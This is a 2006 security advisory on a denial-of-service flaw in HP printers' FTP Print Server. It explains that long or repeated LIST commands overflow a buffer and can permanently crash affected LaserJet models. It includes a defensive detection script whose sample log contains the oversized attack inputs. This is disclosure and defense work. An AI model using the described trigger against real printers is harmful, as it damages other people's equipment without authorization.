HP FTP Printer Server Denial Of Service
---------------------------------------

Author: Joxean Koret
Date: 2006
Location: Basque Country

Affected Software
-----------------

Vendor: Hewlett Packard
Description: HP Printers FTP Server Denial Of Service

Description
-----------
A problem exists in almost any HP printer currently in use with the FTP
Print Server.

Version 2.4 of the FTP Print Server will crash with only one shot.
Version 2.4.5, which is the latest, needs several shots (the number of
shots needed is currently unknown).

While playing with my own FTP fuzzer I tried finding flaws in HP's
printers. After trying 5 printers I found the problem in all of them.
The problem is a buffer overflow in the LIST and NLST commands. In
version 2.4 a single shot sending a LIST command with a long string
(about 256 characters) is sufficient to test the vulnerability. Take
care trying it, because two of my printers crashed completely (you will
need to make use of your warranty ;] ). Against 2.4 versions it can
crash the whole printer and leave it unresponsive even after rebooting.

In version 2.4.5 (which is the latest) you need to send long shots to
the LIST command several times (a single shot will not crash it; the
printer will answer with a "Path too long" message). You will need to
send a LIST command with long strings several times. When trying other
commands you will see that no problem is raised and the printer always
stays responsive. After a successful attack you may completely crash
your printer (i.e., you will be calling technical support to fix your
crashed printer).

The problem can be easily triggered using any FTP fuzzing tool. You can
crash your printer in about 10 seconds on a LAN.

The printer models I used in my tests are:

* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)
* HP LaserJet 5100 Series (firmware V.29.12)

POCs for the vulnerabilities are attached.
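A defender-side check for the condition described above, added here as an example and not part of the original advisory or its attached POCs: it parses FTP control-channel command lines (a constructed sample log in an assumed "<client> <command line>" format, not real printer traffic) and flags clients that repeatedly send LIST or NLST with an argument longer than the roughly 256 characters the advisory cites.

```python
import re
from collections import defaultdict

# Constructed sample of FTP control-channel command lines as a sensor
# or proxy might log them ("<client> <command line>"); not real printer traffic.
SAMPLE_LOG = [
    "10.0.0.5 USER anonymous",
    "10.0.0.5 PASS guest@",
    "10.0.0.5 LIST",
    "10.0.0.5 NLST ./",
    "10.0.0.9 USER anonymous",
    "10.0.0.9 LIST " + "./A" * 100,   # 300-character argument
    "10.0.0.9 LIST " + "./A" * 100,
    "10.0.0.9 NLST " + "./A" * 100,
    "10.0.0.7 RETR " + "A" * 400,     # long, but not LIST/NLST
]

# The advisory says about 256 characters is enough against 2.4, while 2.4.5
# only falls over after repeated long requests, so hits are counted per client.
ARG_LIMIT = 256
AFFECTED = ("LIST", "NLST")
LINE_RE = re.compile(r"^(\S+)\s+([A-Za-z]{3,4})(?:\s(.*))?$")


def parse_line(line):
    """Return (client, COMMAND, argument) or None if the line does not parse."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    client, cmd, arg = m.groups()
    return client, cmd.upper(), arg or ""


def find_long_list_args(lines, limit=ARG_LIMIT):
    """Per-client count of LIST/NLST commands whose argument exceeds `limit`."""
    hits = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, cmd, arg = parsed
        if cmd in AFFECTED and len(arg) > limit:
            hits[client] += 1
    return dict(hits)


def alerts(lines, repeat_threshold=2):
    """Clients that sent at least `repeat_threshold` oversize LIST/NLST commands."""
    counts = find_long_list_args(lines)
    return sorted(c for c, n in counts.items() if n >= repeat_threshold)
```

Set repeat_threshold=1 when the monitored printers run 2.4, where the advisory says a single long LIST is enough.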
Workaround
----------

Disable the FTP print server as, surely, you aren't using it.

Disclaimer
----------

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

Contact
-------

Joxean Koret < joxeankoret [at] yah00 [D0T] es >